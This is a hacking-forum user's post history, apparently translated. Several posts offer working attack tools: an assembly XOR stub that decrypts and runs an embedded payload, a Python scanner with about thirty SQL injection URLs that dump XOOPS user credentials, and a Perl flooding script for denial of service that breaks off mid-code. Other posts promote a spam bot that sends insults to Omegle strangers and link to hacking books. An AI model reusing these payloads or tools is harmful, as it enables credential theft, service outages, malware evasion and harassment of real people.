Posts - ZanGetsu

#21
It bothers me a bit too, especially when they use images from servers that are literally slow; loading takes a long time.
Maybe they could do something with the AJAX success callback so that it loads anyway even if not everything has loaded, although it would lose its function.
But mind you, not everything pretty is functional.

Regards!
#22

Code: php
▼ 1 Introduction to 802.11 Hacking
802.11 in a Nutshell
The Basics
Addressing in 802.11 Packets
802.11 Security Primer
Discovery Basics
Hardware and Drivers
A Note on the Linux Kernel
Chipsets and Linux Drivers
Modern Chipsets and Drivers
Cards
Antennas
Cellular Data Cards
GPS
Summary
▼ 2 Scanning and Enumerating 802.11 Networks
Choosing an Operating System
Windows

xii Hacking Exposed Wireless: Wireless Security Secrets & Solutions
OS X
Linux
Windows Discovery Tools
Vistumbler
inSSIDer
Windows Sniffing/Injection Tools
NDIS 6.0 Monitor Mode Support (NetMon)
AirPcap
CommView for WiFi
OS X Discovery Tools
KisMAC
Kismet on OS X
Linux Discovery Tools
Kismet
Mobile Discovery Tools
Online Mapping Services (WIGLE and Skyhook)
Summary
▼ 3 Attacking 802.11 Wireless Networks
Basic Types of Attacks
Security Through Obscurity
Defeating WEP
WEP Key Recovery Attacks
Bringing It All Together: Cracking a Hidden Mac-Filtering, WEP-Encrypted Network
Keystream Recovery Attacks Against WEP
Attacking the Availability of Wireless Networks
Summary
▼ 4 Attacking WPA-Protected 802.11 Networks
Breaking Authentication: WPA-PSK
Breaking Authentication: WPA Enterprise
Obtaining the EAP Handshake
LEAP
PEAP and EAP-TTLS
EAP-TLS
EAP-FAST
EAP-MD5
Breaking Encryption: TKIP
Attacking Components
Summary

Part II Hacking 802.11 Clients
Case Study: Riding the Insecure Airwaves
▼ 5 Attack 802.11 Wireless Clients
Attacking the Application Layer
Attacking Clients Using an Evil DNS Server
Ettercap Support for Content Modification
Dynamically Generating Rogue APs and Evil Servers with Karmetasploit
Direct Client Injection Techniques
Injecting Data Packets with AirPWN
Generic Client-side Injection with airtun-ng
Munging Software Updates with IPPON
Device Driver Vulnerabilities
Fingerprinting Device Drivers
Web Hacking and Wi-Fi
Hacking DNS via XSRF Attacks Against Routers
Summary
▼ 6 Taking It All The Way: Bridging the Airgap from OS X
The Game Plan
Preparing the Exploit
Prepping the Callback
Performing Initial Reconnaissance
Preparing Kismet, Aircrack-ng
Prepping the Package
Exploiting WordPress to Deliver the Java Exploit
Making the Most of User-level Code Execution
Gathering 802.11 Intel (User-level Access)
Popping Root by Brute-forcing the Keychain
Returning Victorious to the Machine
Managing OS X's Firewall
Summary
▼ 7 Taking It All the Way: Bridging the Airgap from Windows
The Attack Scenario
Preparing for the Attack
Exploiting Hotspot Environments
Controlling the Client
Local Wireless Reconnaissance
Remote Wireless Reconnaissance
Windows Monitor Mode
Microsoft NetMon
Target Wireless Network Attack
Summary
Part III Hacking Additional Wireless Technologies
Case Study: Snow Day
▼ 8 Bluetooth Scanning and Reconnaissance
Bluetooth Technical Overview
Device Discovery
Protocol Overview
Bluetooth Profiles
Encryption and Authentication
Preparing for an Attack
Selecting a Bluetooth Attack Device
Reconnaissance
Active Device Discovery
Passive Device Discovery
Hybrid Discovery
Passive Traffic Analysis
Service Enumeration
Summary
▼ 9 Bluetooth Eavesdropping
Commercial Bluetooth Sniffing
Open-Source Bluetooth Sniffing
Summary
▼ 10 Attacking and Exploiting Bluetooth
PIN Attacks
Practical PIN Cracking
Identity Manipulation
Bluetooth Service and Device Class
Bluetooth Device Name
Abusing Bluetooth Profiles
Testing Connection Access
Unauthorized AT Access
Unauthorized PAN Access
Headset Profile Attacks
File Transfer Attacks
Future Outlook
Summary
▼ 11 Hack ZigBee
ZigBee Introduction
ZigBee's Place as a Wireless Standard
ZigBee Deployments
ZigBee History and Evolution

ZigBee Layers
ZigBee Profiles
ZigBee Security
Rules in the Design of ZigBee Security
ZigBee Encryption
ZigBee Authenticity
ZigBee Authentication
ZigBee Attacks
Introduction to KillerBee
Network Discovery
Eavesdropping Attacks
Replay Attacks
Encryption Attacks
Attack Walkthrough
Network Discovery and Location
Analyzing the ZigBee Hardware
RAM Data Analysis
Summary
▼ 12 Hack DECT
DECT Introduction
DECT Profiles
DECT PHY Layer
DECT MAC Layer
Base Station Selection
DECT Security
Authentication and Pairing
Encryption Services
DECT Attacks
DECT Hardware
DECT Eavesdropping
DECT Audio Recording
Summary
▼ A Scoping and Information Gathering
Pre-assessment
Scoping
Things to Bring to a Wireless Assessment
Conducting Scoping Interviews
Gathering Information via Satellite Imagery
Putting It All Together


Download link:
Code: php
https://jumpshare.com/v/d9r6fFgGe7mOfyx7wI3i
#23
C# - VB.NET / FkN RAT SRC
July 27, 2017, 09:48:24 AM


#24
ASM / X0R encryption
July 27, 2017, 09:41:58 AM
Code: asm
.386
.model flat, stdcall
option casemap:none


include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib


.data
Key db "uidoisbossuidoisboss"   ;key for decrypting
KeyLength equ $- offset Key
.data?
Buffer db ?
.code
start:
jmp Go
Payload:
db 00bh, 064h, 08dh, 07fh, 032h, 0d2h, 015h,\ ;
   069h, 022h, 039h, 00fh, 064h, 0d8h, 055h,\ ;
   038h, 06ah, 032h, 059h, 030h, 08eh, 04ch,\ ;
   065h, 077h, 061h, 08ch, 081h, 094h, 095h,\ ;
   0c6h, 063h, 053h, 01fh, 01ah, 009h, 001h,\ ;
   010h, 025h, 059h, 01ah, 046h, 05ah, 05fh,\ ;
   008h, 06ah, 08dh, 0a1h, 09eh, 09bh, 099h   ;
db 038h, 00bh, 054h, 040h, 05eh, 017h, 06ah,\ ;
   090h,   ;



Go:
mov ebx, KeyLength ;set the key length
mov ecx, 0 ;zero the main iterator
mov edx, 0 ;zero the key iterator
lea eax, Key
Cipher:
cmp byte Payload[ecx], 090h    ;check whether the byte is the NOP terminator
je Payload ;if so, jump to Payload
cmp ebx, edx ;check whether the key iterator has reached the length limit
jg Skip ;if not, skip the next instruction
lea eax, Key ;reset the key pointer
Skip:
mov DL, [eax]
xor Payload[ecx], DL ;XOR the payload byte
inc ecx ;Iterator++
inc edx ;KeyIterator++
inc eax
jmp Cipher ;return to the beginning of the loop
end start

The Ethical Hacking is Trash
#25
Networks and antennas / Moscrack - WPA key cracking
July 26, 2017, 05:03:10 PM
Moscrack is a Perl application designed to facilitate cracking WPA keys in parallel on a group of computers.

This is accomplished by using Mosix clustering software, or SSH or RSH access to a number of nodes.

With Moscrack's new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and Blowfish* Unix password hashes can be processed with the Dehasher Moscrack plugin.

Some of Moscrack's features:


  • Basic API allows remote monitoring
  • Automatic and dynamic node configuration
  • Live CD/USB allows boot-and-forget dynamic node configuration
  • Can be extended through plugins
  • Uses aircrack-ng (including 1.2 Beta) by default
  • CUDA/OpenCL support via the Pyrit plugin
  • CUDA support via aircrack-ng-cuda (untested)
  • Does not require an agent/daemon on nodes
  • Can crack/compare SHA256/512, DES, MD5 and Blowfish hashes via the Dehasher plugin
  • Easily supports a large number of nodes
  • Designed to run for long periods of time
  • Does not exit on errors/failures when possible
  • Supports mixed OS/protocol configurations
  • Supports SSH, RSH, Mosix for node connectivity
  • Effectively handles mixed fast and slow nodes or links
  • Architecture independent
  • Supports Mosix clustering software
  • Supports all the most commonly used operating systems as processing nodes
  • Node prioritization based on speed
  • Nodes can be added/removed/modified while Moscrack is running
  • Very verbose, hides nothing, logs aggressively
  • Includes a "top"-like status viewer
  • Includes a CGI web status viewer
  • Includes an optional basic X11 GUI





Regards!!
#26
Python / Xoops Scan Sql
July 26, 2017, 09:58:12 AM

Code: python
#!/usr/bin/python
#XOOPS Module SQL scanner, checks source for md5's


#Uncomment line 63 for verbose mode. If md5 found
#check manually.


#d3hydr8[at]gmail[dot]com


import sys, urllib2, re, time


print "\n\t   d3hydr8[at]gmail[dot]com XOOPScan v1.0"
print "\t------------------------------------------"


sqls = ["modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*",
"modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
"modules/articles/index.php?cat_id=-1%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/articles/index.php?cat_id=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3,4%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/friendfinder/view.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myads/index.php?pa=view&cid=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3%20from%20xoops_users/*",
"modules/repository/viewcat.php?cid=111111%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/core/viewcat.php?cid=99999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/core/viewcat.php?cid=98989898%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/ecal/display.php?katid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),user,char(112,97,115,115,119,111,114,100,58),password),2%20from%20mysql.user/*",
"modules/tinyevent/index.php?op=show&id=999999%20union%20select%201,2,3,4,concat(char(117,115,101,114,110,97,109,101,45,45),uname,char(112,97,115,115,119,111,114,100,45,45),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/kshop/product_details.php?id=9999999%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6,7,8,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/camportail/show.php?op=showcam&camid=999999%20union%20select%201,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),7,8,9,1,02,3,4,5,6%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myalbum/viewcat.php?cid=9999999%20union%20select%201111,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/wfsection/print.php?articleid=9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/zmagazine/print.php?articleid=9999999%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),5,6,7,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/rha7downloads/visit.php?cid=-1&lid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/wflinks/viewcat.php?cid=-1%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/jobs/index.php?pa=jobsview&cid=-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
"modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
"modules/glossaire/glossaire-p-f.php?op=ImprDef&sid=999999%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2,3%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myconference/index.php?sid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass,char(98,105,116,101,114))%20from%20xoops_users%20where%20uid%20like%201/*",
"modules/myTopics/print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20",
"modules/eEmpregos/index.php?pa=view&cid=-00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202",
"modules/classifieds/index.php?pa=Adsview&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1",
"modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme",
"modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass",
"modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*",
"modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*",
"modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*",
"modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*",
"modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*"]


if len(sys.argv) != 2:
    print "\nUsage: ./xoopscan.py <site>"
    print "Ex: ./xoopscan.py www.test.com\n"
    sys.exit(1)


host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
    host = host+"/"
if host[:7] != "http://":
    host = "http://"+host

print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)


print "[+] Starting Scan...\n"
for sql in sqls:
    time.sleep(3) #Change this if needed
    #print "[+] Trying:",host+sql.replace("\n","")
    try:
        source = urllib2.urlopen(host+sql.replace("\n","")).read()
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >= 1:
            print "[!]",host+sql.replace("\n","")
            for md5 in md5s:
                print "\n[+]MD5:",md5
    except(urllib2.HTTPError,urllib2.URLError):
        pass
print "\n[-] Done\n"
#27
Hacking / CS-Omegle-Bot
July 25, 2017, 01:03:35 PM
Here is a script for spamming Omegle, a random chat:


CS Omegle Bot will help you to send automatic messages to strangers. You can add interests and can predefine up to 4 messages. While entering interests, make sure to add a comma.

Dependencies

  • Python
  • Selenium
  • PyVirtualDisplay

Code: php

Usage :

$ python CS.Omegle.Bot.py
Enter the interests Example. friends,girls,fag, >> girls,friends,love,justin bieber
Enter your first message (1/4) >> Hi...
Enter your second message (2/4) >> You are a FAG
Enter your third message (3/4) >> You Look stupid
Enter your fourth message (4/4) >> Go away
Enter y to use proxy and n to not use proxy >> n



#28
C# - VB.NET / Src Bootnet + Login User
July 24, 2017, 11:09:09 PM





#29

Code: php
▼ 1 The Mobile Risk Ecosystem
The Mobile Ecosystem
Scale
Perceived Insecurity
The Mobile Risk Model
Physical Risks
Service Risks
App Risks
Our Agenda
Summary
▼ 2 Hacking the Cellular Network
Basic Cellular Network Functionality
Interoperability
Voice Calls
The Control Channels
Voice Mailboxes
Short Message Service
Attacks and Countermeasures
The Brave New World of IP
Summary
▼ 3 iOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Know Your iPhone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
How Secure Is iOS? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Jailbreaking: Unleash the Fury! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Boot-based Jailbreak . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
00_FM.indd xiii 6/19/2013 12:33:23 AM
xiv Hacking Exposed: Mobile Security Secrets & Solutions
Hacking Other iPhones: Fury, Unleashed! . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
▼ 4 Android . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Security Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Application Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Data Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Near Field Communication (NFC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Android Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Android Emulator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Android Debug Bridge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Rooting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
Decompiling and Disassembly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Decompiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Intercepting Network Traffi c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Adding Trusted CA Certifi cates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Confi guring a Proxy Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Intent-Based Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
NFC-Based Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Information Leakage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Leakage via Internal Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Leakage via External Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
Information Leakage via Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Information Leakage via Insecure Components . . . . . . . . . . . . . . . . . 113
General Mitigation Strategies to Prevent Information Leakage . . . . 117
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
▼ 5 Mobile Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Android Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
iOS Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140
Malware Security: Android vs. iOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
▼ 6 Mobile Services and Mobile Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
General Web Service Security Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Attacks Against XML-based Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Common Authentication and Authorization Frameworks . . . . . . . . . . . . . . 155
OAuth 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
SAML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
Mobile Web Browser and WebView Security . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Exploiting Custom URI Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Exploiting JavaScript Bridges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
00_FM.indd xiv 6/19/2013 12:33:23 AM
Contents xv
▼ 7 Mobile Device Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
MDM Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Device Provisioning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Bypassing MDM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196
Decompiling and Debugging Apps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Detecting Jailbreaks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
Remote Wipe and Lock . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
▼ 8 Mobile Development Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Mobile App Threat Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Assets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
Finishing and Using the Threat Model . . . . . . . . . . . . . . . . . . . . . . . . . 218
Secure Mobile Development Guidance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Preparation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Secure Mobile Application Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . 221
Testing to Make Sure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
For Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233
▼ 9 Mobile Payments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
Current Generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
Contactless Smartcard Payments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Secure Element . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Secure Element API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
Mobile Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Google Wallet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Square . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
▼ A Consumer Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
▼ B Mobile Application Penetration Testing Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
iOS Pen Test Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
Android Pen Test Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266


Download link:
Code: php
https://jumpshare.com/v/f92aUO9UkSXbhSnHyo5f
#30
I would use Bing, and as for email, well, I'd be screwed, since my work's institutional account is with Google :P
#31
Hi, this isn't that new, but I hadn't seen it on the forum :D

Well, the following exploit is used to change users' passwords without having privileges. Let's see:

We open the console and run net user "pass" to try to change it (all of this still without the exploit)

As we can see, it doesn't let us change the password.

Now let's try with the exploit:

And done.

Here is the site where you can download it:

Besides that, here is a video I found on YouTube, since I didn't have time to make one:

Regards!
#32
Perl / [Perl] - Spoofed Attack script
July 24, 2017, 10:12:10 AM

Code: perl
#!/usr/bin/perl
use Term::ANSIColor;
use Net::RawIP;
use IO::Socket::INET;


( $PROG = $0 ) =~ s/^.*[\/\\]//;


if ( @ARGV == 0 ) {
        print "Usage : ./$PROG [IP] [Port] [Time] [Protocol] \n\n";
        print "Protocols :  \n\n-UDP\n-TCP\n-ICMP\n-HTTP\n";
    exit;
}


my $size = 'ABABABAZERTYUIOP1234567890CD123456789AZERTYUIOPQSDFGHJKLMEFGHIJKLMNOPKRSTUVWXYZ​CDEFEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrGEFGHIJKLMNOPQRSTUVWXYZ1234​56789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKL​MNOPQRSTUVWXYZ123456789abcdefghijklmnopqrHIJKLMNOPQREFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKLMN​OPQRSTUVWXYZ123456789abcdefghijklmnopqrSTUVWXYZ123456789abcdefghijklmnopqrstuvwx​yzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ​RSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789a​bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrst​uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM​NOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS​TUVWXYZ123456789abcdefghijklmnopqrstuvwxyz';
my $victime = $ARGV[0];
my $port = $ARGV[1];
my $temps = $ARGV[2];
my $proto = $ARGV[3];
$endtime = time() + ($temps ? $temps : 1000000);

my @referer = ('http://www.google.com/url?sa=t&rct=j&q=&eip_source=s&source=web&cd=1&url=$victime');


my @agent = ('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows; I; Windows NT 5.1; ru; rv:1.9.2.13)',
'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
'Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; LNV-Lenovo K910e/S100; 1080*1920; CTC/2.0) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safa',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]',
